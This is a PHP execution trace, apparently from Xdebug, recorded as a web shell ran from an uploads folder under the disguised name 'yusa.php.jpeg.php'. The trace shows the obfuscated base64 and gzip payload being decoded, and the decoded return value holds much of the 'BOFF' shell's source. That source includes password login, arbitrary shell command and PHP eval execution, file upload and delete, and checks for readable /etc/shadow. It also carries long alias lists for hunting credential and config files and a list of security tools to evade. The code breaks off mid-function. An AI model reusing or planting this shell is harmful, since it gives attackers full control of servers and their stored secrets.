Version: 3.1.0beta2 File format: 4 TRACE START [2023-02-12 19:26:36.841004] 1 0 1 0.000153 393576 1 3 0 0.000355 430752 {main} 1 /var/www/html/uploads/yusa.php.jpeg.php 0 0 2 4 0 0.000379 430864 base64_decode 0 /var/www/html/uploads/yusa.php.jpeg.php 48 1 'eJzlvX1XGzcTOPo3PaffQWz9dO3GGNskbWowgRBISBNIeUnShPzctb22t6y97u4aQ1I+6++r3JnRy0r7Ykzy9LnnnktOwJZGo9FIGo1GoxFj8mfryXQ0Zd9/9/13rDR3u6zNSp3T/ZO3+ycfrRdnZ286L45Pz6xPm5jvTf4y8k/2fz/fPz3rnJ8cCohu0L8BEGt/eNM5nXp9N2QXk/PIDY+csdtiVm0Uj/1o6vY8x++NnDAql2KnNxj2P9qzCYDYnyqsZl1M3jhR9C4I+63vv1tUZjoHGCiDRV67UeQM3dbFxMKv+2tQ65Ub5lX6/Xdl1Qhba4TAJIs288qypKjF/3aOdl/vW7zoxeTwTQu4aSE3xo7nl635dMf3rtzaILSq1unI9X02iuNpa30d+Y08tarMIs5ZFSj2A3sH3cABuzesGwwG339XcmbxqDMFriB3EXupF/hBiN9+6A8eUUrfHTgzP+44vdgLJpBlH3i+G712JraePYvcjvOXcw0AcThz' 2 4 1 0.000482 459568 2 4 R 'x}W\0337\02387=Alt\030$mj0\020HH\023HyI҄ܵ\032CR>ܙJbLKNFH\032F\021cgt4ew4wJ\'\037\027ggo:/OϬOM2O??=뜟\034\nnп\001\020kx9z}7d\027\rbVm\024h<0*b7\030?ڳ\t؟*f]L8Q.\b[Tf:\a\030(E^Q\f¯kP\033Uwe\b[k$6ʲvv_[M\vi!7Ǝ痭t }6ik}\035<"Y\025(\003{\a\0017\033\f\006Wrf3\005 w\021{\027A~\017\036QJ\03583?8\v&e\037x\033v&=܎s\r\000q8s,j\033cwޤ\03' 2 5 0 0.000869 459536 gzuncompress 0 /var/www/html/uploads/yusa.php.jpeg.php 48 1 'x}W\0337\02387=Alt\030$mj0\020HH\023HyI҄ܵ\032CR>ܙJbLKNFH\032F\021cgt4ew4wJ\'\037\027ggo:/OϬOM2O??=뜟\034\nnп\001\020kx9z}7d\027\rbVm\024h<0*b7\030?ڳ\t؟*f]L8Q.\b[Tf:\a\030(E^Q\f¯kP\033Uwe\b[k$6ʲvv_[M\vi!7Ǝ痭t }6ik}\035<"Y\025(\003{\a\0017\033\f\006Wrf3\005 w\021{\027A~\017\036QJ\03583?8\v&e\037x\033v&=܎s\r\000q8s,j\033cwޤ\03' 2 5 1 0.001493 529200 2 5 R ' Authorization
0ff \\/\\/3 $|-|311 1.0
Password: >\'>
");\r\n}\r\n\r\nif(!isset($_SESSION[md5($_SERVER[\'HTTP_HOST\'])]))\r\n\tif( empty($auth_pass) || ( isset($_POST[\'pass\']) && (md5($_POST[\'pass\']) == $auth_pass) ) )\r\n\t\t$_SESSION[md5($_SERVER[\'HTTP_HOST\'])] = true;\r\n\telse\r\n\t\tBOFFLogin();\r\n\r\nif(strtolower(substr(PHP_OS,0,3)) == "win")\r\n\t$os = \'win\';\r\nelse\r\n\t$os = \'nix\';\r\n\r\n$safe_mode = @ini_get(\'safe_mode\');\r\nif(!$safe_mode)\r\n error_reporting(0);\r\n\r\n$disable_functions = @ini_get(\'disable_functions\');\r\n$home_cwd = @getcwd();\r\nif(isset($_POST[\'c\']))\r\n\t@chdir($_POST[\'c\']);\r\n$cwd = @getcwd();\r\nif($os == \'win\') {\r\n\t$home_cwd = str_replace("\\\\", "/", $home_cwd);\r\n\t$cwd = str_replace("\\\\", "/", $cwd);\r\n}\r\nif( $cwd[strlen($cwd)-1] != \'/\' )\r\n\t$cwd .= \'/\';\r\n\r\nif(!isset($_SESSION[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\']))\r\n $_SESSION[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\'] = (bool)$GLOBALS[\'default_use_ajax\'];\r\n\t\r\nif($os == \'win\')\r\n\t$aliases = array(\r\n\t\t"List Directory" => "dir",\r\n \t"Find index.php in current dir" => "dir /s /w /b index.php",\r\n \t"Find *config*.php in current dir" => "dir /s /w /b *config*.php",\r\n \t"Show active connections" => "netstat -an",\r\n \t"Show running services" => "net start",\r\n \t"User accounts" => "net user",\r\n \t"Show computers" => "net view",\r\n\t\t"ARP Table" => "arp -a",\r\n\t\t"IP Configuration" => "ipconfig /all"\r\n\t);\r\nelse\r\n\t$aliases = array(\r\n \t\t"List dir" => "ls -lha",\r\n\t\t"list file attributes on a Linux second extended file system" => "lsattr -va",\r\n \t\t"show opened ports" => "netstat -an | grep -i listen",\r\n "process status" => "ps aux",\r\n\t\t"Find" => "",\r\n \t\t"find all suid files" => "find / -type f -perm -04000 -ls",\r\n \t\t"find suid files in current dir" => "find . -type f -perm -04000 -ls",\r\n \t\t"find all sgid files" => "find / -type f -perm -02000 -ls",\r\n \t\t"find sgid files in current dir" => "find . -type f -perm -02000 -ls",\r\n \t\t"find config.inc.php files" => "find / -type f -name config.inc.php",\r\n \t\t"find config* files" => "find / -type f -name \\"config*\\"",\r\n \t\t"find config* files in current dir" => "find . -type f -name \\"config*\\"",\r\n \t\t"find all writable folders and files" => "find / -perm -2 -ls",\r\n \t\t"find all writable folders and files in current dir" => "find . -perm -2 -ls",\r\n \t\t"find all service.pwd files" => "find / -type f -name service.pwd",\r\n \t\t"find service.pwd files in current dir" => "find . -type f -name service.pwd",\r\n \t\t"find all .htpasswd files" => "find / -type f -name .htpasswd",\r\n \t\t"find .htpasswd files in current dir" => "find . -type f -name .htpasswd",\r\n \t\t"find all .bash_history files" => "find / -type f -name .bash_history",\r\n \t\t"find .bash_history files in current dir" => "find . -type f -name .bash_history",\r\n \t\t"find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",\r\n \t\t"find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",\r\n\t\t"Locate" => "",\r\n \t\t"locate httpd.conf files" => "locate httpd.conf",\r\n\t\t"locate vhosts.conf files" => "locate vhosts.conf",\r\n\t\t"locate proftpd.conf files" => "locate proftpd.conf",\r\n\t\t"locate psybnc.conf files" => "locate psybnc.conf",\r\n\t\t"locate my.conf files" => "locate my.conf",\r\n\t\t"locate admin.php files" =>"locate admin.php",\r\n\t\t"locate cfg.php files" => "locate cfg.php",\r\n\t\t"locate conf.php files" => "locate conf.php",\r\n\t\t"locate config.dat files" => "locate config.dat",\r\n\t\t"locate config.php files" => "locate config.php",\r\n\t\t"locate config.inc files" => "locate config.inc",\r\n\t\t"locate config.inc.php" => "locate config.inc.php",\r\n\t\t"locate config.default.php files" => "locate config.default.php",\r\n\t\t"locate config* files " => "locate config",\r\n\t\t"locate .conf files"=>"locate \'.conf\'",\r\n\t\t"locate .pwd files" => "locate \'.pwd\'",\r\n\t\t"locate .sql files" => "locate \'.sql\'",\r\n\t\t"locate .htpasswd files" => "locate \'.htpasswd\'",\r\n\t\t"locate .bash_history files" => "locate \'.bash_history\'",\r\n\t\t"locate .mysql_history files" => "locate \'.mysql_history\'",\r\n\t\t"locate .fetchmailrc files" => "locate \'.fetchmailrc\'",\r\n\t\t"locate backup files" => "locate backup",\r\n\t\t"locate dump files" => "locate dump",\r\n\t\t"locate priv files" => "locate priv"\t\r\n\t);\r\n\r\nfunction BOFFHeader() {\r\n\tif(empty($_POST[\'charset\']))\r\n\t\t$_POST[\'charset\'] = $GLOBALS[\'default_charset\'];\r\n\tglobal $color;\r\n\techo "" . $_SERVER[\'HTTP_HOST\'] . " - BOFF " . BOFF_VERSION ."\r\n\r\n\r\n
\r\n
\r\n\r\n\r\n\r\n\r\n\r\n\r\n
";\r\n\t$freeSpace = @diskfreespace($GLOBALS[\'cwd\']);\r\n\t$totalSpace = @disk_total_space($GLOBALS[\'cwd\']);\r\n\t$totalSpace = $totalSpace?$totalSpace:1;\r\n\t$release = @php_uname(\'r\');\r\n\t$kernel = @php_uname(\'s\');\r\n\t$explink = \'http://exploit-db.com/list.php?description=\';\r\n\tif(strpos(\'Linux\', $kernel) !== false)\r\n\t\t$explink .= urlencode(\'Linux Kernel \' . substr($release,0,6));\r\n\telse\r\n\t\t$explink .= urlencode($kernel . \' \' . substr($release,0,3));\r\n\tif(!function_exists(\'posix_getegid\')) {\r\n\t\t$user = @get_current_user();\r\n\t\t$uid = @getmyuid();\r\n\t\t$gid = @getmygid();\r\n\t\t$group = "?";\r\n\t} else {\r\n\t\t$uid = @posix_getpwuid(posix_geteuid());\r\n\t\t$gid = @posix_getgrgid(posix_getegid());\r\n\t\t$user = $uid[\'name\'];\r\n\t\t$uid = $uid[\'uid\'];\r\n\t\t$group = $gid[\'name\'];\r\n\t\t$gid = $gid[\'gid\'];\r\n\t}\r\n\r\n\t$cwd_links = \'\';\r\n\t$path = explode("/", $GLOBALS[\'cwd\']);\r\n\t$n=count($path);\r\n\tfor($i=0; $i<$n-1; $i++) {\r\n\t\t$cwd_links .= "".$path[$i]."/";\r\n\t}\r\n\r\n\t$charsets = array(\'UTF-8\', \'Windows-1251\', \'KOI8-R\', \'KOI8-U\', \'cp866\');\r\n\t$opt_charsets = \'\';\r\n\tforeach($charsets as $item)\r\n\t\t$opt_charsets .= \'\';\r\n\r\n\t$m = array(\'Sec. Info\'=>\'SecInfo\',\'Files\'=>\'FilesMan\',\'Console\'=>\'Console\',\'Sql\'=>\'Sql\',\'Php\'=>\'Php\',\'Safe mode\'=>\'SafeMode\',\'String tools\'=>\'StringTools\',\'Bruteforce\'=>\'Bruteforce\',\'Network\'=>\'Network\');\r\n\tif(!empty($GLOBALS[\'auth_pass\']))\r\n\t\t$m[\'Logout\'] = \'Logout\';\r\n\t$m[\'Self remove\'] = \'SelfRemove\';\r\n\t$menu = \'\';\r\n\tforeach($m as $k => $v)\r\n\t\t$menu .= \'[ \'.$k.\' ]\';\r\n\r\n\t$drives = "";\r\n\tif($GLOBALS[\'os\'] == \'win\') {\r\n\t\tforeach(range(\'c\',\'z\') as $drive)\r\n\t\tif(is_dir($drive.\':\\\\\'))\r\n\t\t\t$drives .= \'[ \'.$drive.\' ] \';\r\n\t}\r\n\techo \'\'\r\n . \'\'\r\n . \'
Uname:
User:
Php:
Hdd:
Cwd:\' . ($GLOBALS[\'os\'] == \'win\'?\'
Drives:\':\'\') . \'		\' . substr(@php_uname(), 0, 120) . \' [exploit-db.com]
\' . $uid . \' ( \' . $user . \' ) Group: \' . $gid . \' ( \' . $group . \' )
\' . @phpversion() . \' Safe mode: \' . ($GLOBALS[\'safe_mode\']?\'ON\':\'OFF\')\r\n . \' [ phpinfo ] Datetime: \' . date(\'Y-m-d H:i:s\') . \'
\' . BOFFViewSize($totalSpace) . \' Free: \' . BOFFViewSize($freeSpace) . \' (\'. (int) ($freeSpace/$totalSpace*100) . \'%)
\' . $cwd_links . \' \'. BOFFPermsColor($GLOBALS[\'cwd\']) . \' [ home ]
\' . $drives . \'
Server IP:
\' . @$_SERVER["SERVER_ADDR"] . \'
Client IP:
\' . $_SERVER[\'REMOTE_ADDR\'] . \'
\'\r\n . \'\' . $menu . \'
\';\r\n}\r\n\r\nfunction BOFFFooter() {\r\n\t$is_writable = is_writable($GLOBALS[\'cwd\'])?" (Writeable)":" (Not writable)";\r\n echo "\r\n
\r\n\r\n\t\r\n\t\t\r\n\t\t\r\n\t\r\n\t\t\r\n\t\t\r\n\t\r\n\t\t\r\n\t\t\r\n\t
Change dir:
>\'>
Read file:
>\'>
Make dir:$is_writable
>\'>
Make file:$is_writable
>\'>
Execute:
>\'>
\r\n\t\t\r\n\t\t\r\n\t\t\r\n\t\t\r\n\t\tUpload file:$is_writable
>\'>

";\r\n}\r\n\r\nif (!function_exists("posix_getpwuid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getpwuid\')===false)) {\r\n function posix_getpwuid($p) {return false;} }\r\nif (!function_exists("posix_getgrgid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getgrgid\')===false)) {\r\n function posix_getgrgid($p) {return false;} }\r\n\r\nfunction BOFFEx($in) {\r\n\t$out = \'\';\r\n\tif (function_exists(\'exec\')) {\r\n\t\t@exec($in,$out);\r\n\t\t$out = @join("\\n",$out);\r\n\t} elseif (function_exists(\'passthru\')) {\r\n\t\tob_start();\r\n\t\t@passthru($in);\r\n\t\t$out = ob_get_clean();\r\n\t} elseif (function_exists(\'system\')) {\r\n\t\tob_start();\r\n\t\t@system($in);\r\n\t\t$out = ob_get_clean();\r\n\t} elseif (function_exists(\'shell_exec\')) {\r\n\t\t$out = shell_exec($in);\r\n\t} elseif (is_resource($f = @popen($in,"r"))) {\r\n\t\t$out = "";\r\n\t\twhile(!@feof($f))\r\n\t\t\t$out .= fread($f,1024);\r\n\t\tpclose($f);\r\n\t}\r\n\treturn $out;\r\n}\r\nfunction BOFFViewSize($s) {\r\n\tif($s >= 1073741824)\r\n\t\treturn sprintf(\'%1.2f\', $s / 1073741824 ). \' GB\';\r\n\telseif($s >= 1048576)\r\n\t\treturn sprintf(\'%1.2f\', $s / 1048576 ) . \' MB\';\r\n\telseif($s >= 1024)\r\n\t\treturn sprintf(\'%1.2f\', $s / 1024 ) . \' KB\';\r\n\telse\r\n\t\treturn $s . \' B\';\r\n}\r\n\r\nfunction BOFFPerms($p) {\r\n\tif (($p & 0xC000) == 0xC000)$i = \'s\';\r\n\telseif (($p & 0xA000) == 0xA000)$i = \'l\';\r\n\telseif (($p & 0x8000) == 0x8000)$i = \'-\';\r\n\telseif (($p & 0x6000) == 0x6000)$i = \'b\';\r\n\telseif (($p & 0x4000) == 0x4000)$i = \'d\';\r\n\telseif (($p & 0x2000) == 0x2000)$i = \'c\';\r\n\telseif (($p & 0x1000) == 0x1000)$i = \'p\';\r\n\telse $i = \'u\';\r\n\t$i .= (($p & 0x0100) ? \'r\' : \'-\');\r\n\t$i .= (($p & 0x0080) ? \'w\' : \'-\');\r\n\t$i .= (($p & 0x0040) ? (($p & 0x0800) ? \'s\' : \'x\' ) : (($p & 0x0800) ? \'S\' : \'-\'));\r\n\t$i .= (($p & 0x0020) ? \'r\' : \'-\');\r\n\t$i .= (($p & 0x0010) ? \'w\' : \'-\');\r\n\t$i .= (($p & 0x0008) ? (($p & 0x0400) ? \'s\' : \'x\' ) : (($p & 0x0400) ? \'S\' : \'-\'));\r\n\t$i .= (($p & 0x0004) ? \'r\' : \'-\');\r\n\t$i .= (($p & 0x0002) ? \'w\' : \'-\');\r\n\t$i .= (($p & 0x0001) ? (($p & 0x0200) ? \'t\' : \'x\' ) : (($p & 0x0200) ? \'T\' : \'-\'));\r\n\treturn $i;\r\n}\r\n\r\nfunction BOFFPermsColor($f) {\r\n\tif (!@is_readable($f))\r\n\t\treturn \'\' . BOFFPerms(@fileperms($f)) . \'\';\r\n\telseif (!@is_writable($f))\r\n\t\treturn \'\' . BOFFPerms(@fileperms($f)) . \'\';\r\n\telse\r\n\t\treturn \'\' . BOFFPerms(@fileperms($f)) . \'\';\r\n}\r\n\r\nif(!function_exists("scandir")) {\r\n\tfunction scandir($dir) {\r\n\t\t$dh = opendir($dir);\r\n\t\twhile (false !== ($filename = readdir($dh)))\r\n \t\t$files[] = $filename;\r\n\t\treturn $files;\r\n\t}\r\n}\r\n\r\nfunction BOFFWhich($p) {\r\n\t$path = BOFFEx(\'which \' . $p);\r\n\tif(!empty($path))\r\n\t\treturn $path;\r\n\treturn false;\r\n}\r\n\r\nfunction actionSecInfo() {\r\n\tBOFFHeader();\r\n\techo \'

Server security information

\';\r\n\tfunction BOFFSecParam($n, $v) {\r\n\t\t$v = trim($v);\r\n\t\tif($v) {\r\n\t\t\techo \'\' . $n . \': \';\r\n\t\t\tif(strpos($v, "\\n") === false)\r\n\t\t\t\techo $v . \'
\';\r\n\t\t\telse\r\n\t\t\t\techo \'
\' . $v . \'
\';\r\n\t\t}\r\n\t}\r\n\t\r\n\tBOFFSecParam(\'Server software\', @getenv(\'SERVER_SOFTWARE\'));\r\n if(function_exists(\'apache_get_modules\'))\r\n BOFFSecParam(\'Loaded Apache modules\', implode(\', \', apache_get_modules()));\r\n\tBOFFSecParam(\'Disabled PHP Functions\', $GLOBALS[\'disable_functions\']?$GLOBALS[\'disable_functions\']:\'none\');\r\n\tBOFFSecParam(\'Open base dir\', @ini_get(\'open_basedir\'));\r\n\tBOFFSecParam(\'Safe mode exec dir\', @ini_get(\'safe_mode_exec_dir\'));\r\n\tBOFFSecParam(\'Safe mode include dir\', @ini_get(\'safe_mode_include_dir\'));\r\n\tBOFFSecParam(\'cURL support\', function_exists(\'curl_version\')?\'enabled\':\'no\');\r\n\t$temp=array();\r\n\tif(function_exists(\'mysql_get_client_info\'))\r\n\t\t$temp[] = "MySql (".mysql_get_client_info().")";\r\n\tif(function_exists(\'mssql_connect\'))\r\n\t\t$temp[] = "MSSQL";\r\n\tif(function_exists(\'pg_connect\'))\r\n\t\t$temp[] = "PostgreSQL";\r\n\tif(function_exists(\'oci_connect\'))\r\n\t\t$temp[] = "Oracle";\r\n\tBOFFSecParam(\'Supported databases\', implode(\', \', $temp));\r\n\techo \'
\';\r\n\t\r\n\tif($GLOBALS[\'os\'] == \'nix\') {\r\n\t\tBOFFSecParam(\'Readable /etc/passwd\', @is_readable(\'/etc/passwd\')?"yes [view]":\'no\');\r\n\t\tBOFFSecParam(\'Readable /etc/shadow\', @is_readable(\'/etc/shadow\')?"yes [view]":\'no\');\r\n\t\tBOFFSecParam(\'OS version\', @file_get_contents(\'/proc/version\'));\r\n\t\tBOFFSecParam(\'Distr name\', @file_get_contents(\'/etc/issue.net\'));\r\n\t\tif(!$GLOBALS[\'safe_mode\']) {\r\n $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n $danger = array(\'kav\',\'nod32\',\'bdcored\',\'uvscan\',\'sav\',\'drwebd\',\'clamd\',\'rkhunter\',\'chkrootkit\',\'iptables\',\'ipfw\',\'tripwire\',\'shieldcc\',\'portsentry\',\'snort\',\'ossec\',\'lidsadm\',\'tcplodg\',\'sxid\',\'logcheck\',\'logwatch\',\'sysmask\',\'zmbscap\',\'sawmill\',\'wormscan\',\'ninja\');\r\n $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n\t\t\techo \'
\';\r\n\t\t\t$temp=array();\r\n\t\t\tforeach ($userful as $item)\r\n\t\t\t\tif(BOFFWhich($item))\r\n $temp[] = $item;\r\n\t\t\tBOFFSecParam(\'Userful\', implode(\', \',$temp));\r\n\t\t\t$temp=array();\r\n\t\t\tforeach ($danger as $item)\r\n\t\t\t\tif(BOFFWhich($item))\r\n $temp[] = $item;\r\n\t\t\tBOFFSecParam(\'Danger\', implode(\', \',$temp));\r\n\t\t\t$temp=array();\r\n\t\t\tforeach ($downloaders as $item) \r\n\t\t\t\tif(BOFFWhich($item))\r\n $temp[] = $item;\r\n\t\t\tBOFFSecParam(\'Downloaders\', implode(\', \',$temp));\r\n\t\t\techo \'
\';\r\n BOFFSecParam(\'HDD space\', BOFFEx(\'df -h\'));\r\n\t\t\tBOFFSecParam(\'Hosts\', @file_get_contents(\'/etc/hosts\'));\r\n\t\t}\r\n\t} else {\r\n\t\tBOFFSecParam(\'OS Version\',BOFFEx(\'ver\'));\r\n\t\tBOFFSecParam(\'Account Settings\',BOFFEx(\'net accounts\'));\r\n\t\tBOFFSecParam(\'User Accounts\',BOFFEx(\'net user\'));\r\n\t}\r\n\techo \'
\';\r\n\tBOFFFooter();\r\n}\r\n\r\nfunction actionPhp() {\r\n\tif(isset($_POST[\'ajax\'])) {\r\n\t\t$_SESSION[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\'] = true;\r\n\t\tob_start();\r\n\t\teval($_POST[\'p1\']);\r\n\t\t$temp = "document.getElementById(\'PhpOutput\').style.display=\'\';document.getElementById(\'PhpOutput\').innerHTML=\'" . addcslashes(htmlspecialchars(ob_get_clean()), "\\n\\r\\t\\\\\'\\0") . "\';\\n";\r\n\t\techo strlen($temp), "\\n", $temp;\r\n\t\texit; \r\n\t}\r\n\tBOFFHeader();\r\n\tif(isset($_POST[\'p2\']) && ($_POST[\'p2\'] == \'info\')) {\r\n\t\techo \'

PHP info

\';\r\n\t\tob_start();\r\n\t\tphpinfo();\r\n\t\t$tmp = ob_get_clean();\r\n $tmp = preg_replace(\'!(body|a:\\w+|body, td, th, h1, h2) {.*}!msiU\',\'\',$tmp);\r\n\t\t$tmp = preg_replace(\'!td, th {(.*)}!msiU\',\'.e, .v, .h, .h th {$1}\',$tmp);\r\n\t\techo str_replace(\'
\';\r\n\t}\r\n\tif(empty($_POST[\'ajax\']) && !empty($_POST[\'p1\']))\r\n\t\t$_SESSION[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\'] = false;\r\n echo \'

Execution PHP-code

\';\r\n\techo \' send using AJAX
\';\r\n\tif(!empty($_POST[\'p1\'])) {\r\n\t\tob_start();\r\n\t\teval($_POST[\'p1\']);\r\n\t\techo htmlspecialchars(ob_get_clean());\r\n\t}\r\n\techo \'
\';\r\n\tBOFFFooter();\r\n}\r\n\r\nfunction actionFilesMan() {\r\n\tBOFFHeader();\r\n\techo \'

File manager

\';\r\n\tif(!empty($_POST[\'p1\'])) {\r\n\t\tswitch($_POST[\'p1\']) {\r\n\t\t\tcase \'uploadFile\':\r\n\t\t\t\tif(!@move_uploaded_file($_FILES[\'f\'][\'tmp_name\'], $_FILES[\'f\'][\'name\']))\r\n\t\t\t\t\techo "Can\'t upload file!";\r\n\t\t\t\tbreak;\r\n\t\t\tcase \'mkdir\':\r\n\t\t\t\tif(!@mkdir($_POST[\'p2\']))\r\n\t\t\t\t\techo "Can\'t create new dir";\r\n\t\t\t\tbreak;\r\n\t\t\tcase \'delete\':\r\n\t\t\t\tfunction deleteDir($path) {\r\n\t\t\t\t\t$path = (substr($path,-1)==\'/\') ? $path:$path.\'/\';\r\n\t\t\t\t\t$dh = opendir($path);\r\n\t\t\t\t\twhile ( ($item = readdir($dh) ) !== false) {\r\n\t\t\t\t\t\t$item = $path.$item;\r\n\t\t\t\t\t\tif ( (basename($item) == "..") || (basename($item) == ".") )\r\n\t\t\t\t\t\t\tcontinue;\r\n\t\t\t\t\t\t$type = filetype($item);\r\n\t\t\t\t\t\tif ($type == "dir")\r\n\t\t\t\t\t\t\tdeleteDir($item);\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t@unlink($item);\r\n\t\t\t\t\t}\r\n\t\t\t\t\tclosedir($dh);\r\n\t\t\t\t\t@rmdir($path);\r\n\t\t\t\t}\r\n\t\t\t\tif(is_array(@$_POST[\'f\']))\r\n\t\t\t\t\tforeach($_POST[\'f\'] as $f) {\r\n if($f == \'..\')\r\n continue;\r\n\t\t\t\t\t\t$f = urldecode($f);\r\n\t\t\t\t\t\tif(is_dir($f))\r\n\t\t\t\t\t\t\tdeleteDir($f);\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t@unlink($f);\r\n\t\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase \'paste\':\r\n\t\t\t\tif($_SESSION[\'act\'] == \'copy\') {\r\n\t\t\t\t\tfunction copy_paste($c,$s,$d){\r\n\t\t\t\t\t\tif(is_dir($c.$s)){\r\n\t\t\t\t\t\t\tmkdir($d.$s);\r\n\t\t\t\t\t\t\t$h = @opendir($c.$s);\r\n\t\t\t\t\t\t\twhile (($f = @readdir($h)) !== false)\r\n\t\t\t\t\t\t\t\tif (($f != ".") and ($f != ".."))\r\n\t\t\t\t\t\t\t\t\tcopy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n\t\t\t\t\t\t} elseif(is_file($c.$s))\r\n\t\t\t\t\t\t\t@copy($c.$s, $d.$s);\r\n\t\t\t\t\t}\r\n\t\t\t\t\tforeach($_SESSION[\'f\'] as $f)\r\n\t\t\t\t\t\tcopy_paste($_SESSION[\'c\'],$f, $GLOBALS[\'cwd\']);\t\t\t\t\t\r\n\t\t\t\t} elseif($_SESSION[\'act\'] == \'move\') {\r\n\t\t\t\t\tfunction move_paste($c,$s,$d){\r\n\t\t\t\t\t\tif(is_dir($c.$s)){\r\n\t\t\t\t\t\t\tmkdir($d.$s);\r\n\t\t\t\t\t\t\t$h = @opendir($c.$s);\r\n\t\t\t\t\t\t\twhile (($f = @readdir($h)) !== false)\r\n\t\t\t\t\t\t\t\tif (($f != ".") and ($f != ".."))\r\n\t\t\t\t\t\t\t\t\tcopy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n\t\t\t\t\t\t} elseif(@is_file($c.$s))\r\n\t\t\t\t\t\t\t@copy($c.$s, $d.$s);\r\n\t\t\t\t\t}\r\n\t\t\t\t\tforeach($_SESSION[\'f\'] as $f)\r\n\t\t\t\t\t\t@rename($_SESSION[\'c\'].$f, $GLOBALS[\'cwd\'].$f);\r\n\t\t\t\t} elseif($_SESSION[\'act\'] == \'zip\') {\r\n\t\t\t\t\tif(class_exists(\'ZipArchive\')) {\r\n $zip = new ZipArchive();\r\n if ($zip->open($_POST[\'p2\'], 1)) {\r\n chdir($_SESSION[\'c\']);\r\n foreach($_SESSION[\'f\'] as $f) {\r\n if($f == \'..\')\r\n continue;\r\n if(@is_file($_SESSION[\'c\'].$f))\r\n $zip->addFile($_SESSION[\'c\'].$f, $f);\r\n elseif(@is_dir($_SESSION[\'c\'].$f)) {\r\n $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.\'/\'));\r\n foreach ($iterator as $key=>$value) {\r\n $zip->addFile(realpath($key), $key);\r\n }\r\n }\r\n }\r\n chdir($GLOBALS[\'cwd\']);\r\n $zip->close();\r\n }\r\n }\r\n\t\t\t\t} elseif($_SESSION[\'act\'] == \'unzip\') {\r\n\t\t\t\t\tif(class_exists(\'ZipArchive\')) {\r\n $zip = new ZipArchive();\r\n foreach($_SESSION[\'f\'] as $f) {\r\n if($zip->open($_SESSION[\'c\'].$f)) {\r\n $zip->extractTo($GLOBALS[\'cwd\']);\r\n $zip->close();\r\n }\r\n }\r\n }\r\n\t\t\t\t} elseif($_SESSION[\'act\'] == \'tar\') {\r\n chdir($_SESSION[\'c\']);\r\n $_SESSION[\'f\'] = array_map(\'escapeshellarg\', $_SESSION[\'f\']);\r\n BOFFEx(\'tar cfzv \' . escapeshellarg($_POST[\'p2\']) . \' \' . implode(\' \', $_SESSION[\'f\']));\r\n chdir($GLOBALS[\'cwd\']);\r\n\t\t\t\t}\r\n\t\t\t\tunset($_SESSION[\'f\']);\r\n\t\t\t\tbreak;\r\n\t\t\tdefault:\r\n if(!empty($_POST[\'p1\'])) {\r\n\t\t\t\t\t$_SESSION[\'act\'] = @$_POST[\'p1\'];\r\n\t\t\t\t\t$_SESSION[\'f\'] = @$_POST[\'f\'];\r\n\t\t\t\t\tforeach($_SESSION[\'f\'] as $k => $f)\r\n\t\t\t\t\t\t$_SESSION[\'f\'][$k] = urldecode($f);\r\n\t\t\t\t\t$_SESSION[\'c\'] = @$_POST[\'c\'];\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\t$dirContent = @scandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']);\r\n\tif($dirContent === false) {\techo \'Can\\\'t open this folder!\';BOFFFooter(); return; }\r\n\tglobal $sort;\r\n\t$sort = array(\'name\', 1);\r\n\tif(!empty($_POST[\'p1\'])) {\r\n\t\tif(preg_match(\'!s_([A-z]+)_(\\d{1})!\', $_POST[\'p1\'], $match))\r\n\t\t\t$sort = array($match[1], (int)$match[2]);\r\n\t}\r\necho "\r\n\r\n";\r\n\t$dirs = $files = array();\r\n\t$n = count($dirContent);\r\n\tfor($i=0;$i<$n;$i++) {\r\n\t\t$ow = @posix_getpwuid(@fileowner($dirContent[$i]));\r\n\t\t$gr = @posix_getgrgid(@filegroup($dirContent[$i]));\r\n\t\t$tmp = array(\'name\' => $dirContent[$i],\r\n\t\t\t\t\t \'path\' => $GLOBALS[\'cwd\'].$dirContent[$i],\r\n\t\t\t\t\t \'modify\' => date(\'Y-m-d H:i:s\', @filemtime($GLOBALS[\'cwd\'] . $dirContent[$i])),\r\n\t\t\t\t\t \'perms\' => BOFFPermsColor($GLOBALS[\'cwd\'] . $dirContent[$i]),\r\n\t\t\t\t\t \'size\' => @filesize($GLOBALS[\'cwd\'].$dirContent[$i]),\r\n\t\t\t\t\t \'owner\' => $ow[\'name\']?$ow[\'name\']:@fileowner($dirContent[$i]),\r\n\t\t\t\t\t \'group\' => $gr[\'name\']?$gr[\'name\']:@filegroup($dirContent[$i])\r\n\t\t\t\t\t);\r\n\t\tif(@is_file($GLOBALS[\'cwd\'] . $dirContent[$i]))\r\n\t\t\t$files[] = array_merge($tmp, array(\'type\' => \'file\'));\r\n\t\telseif(@is_link($GLOBALS[\'cwd\'] . $dirContent[$i]))\r\n\t\t\t$dirs[] = array_merge($tmp, array(\'type\' => \'link\', \'link\' => readlink($tmp[\'path\'])));\r\n\t\telseif(@is_dir($GLOBALS[\'cwd\'] . $dirContent[$i])&& ($dirContent[$i] != "."))\r\n\t\t\t$dirs[] = array_merge($tmp, array(\'type\' => \'dir\'));\r\n\t}\r\n\t$GLOBALS[\'sort\'] = $sort;\r\n\tfunction BOFFCmp($a, $b) {\r\n\t\tif($GLOBALS[\'sort\'][0] != \'size\')\r\n\t\t\treturn strcmp(strtolower($a[$GLOBALS[\'sort\'][0]]), strtolower($b[$GLOBALS[\'sort\'][0]]))*($GLOBALS[\'sort\'][1]?1:-1);\r\n\t\telse\r\n\t\t\treturn (($a[\'size\'] < 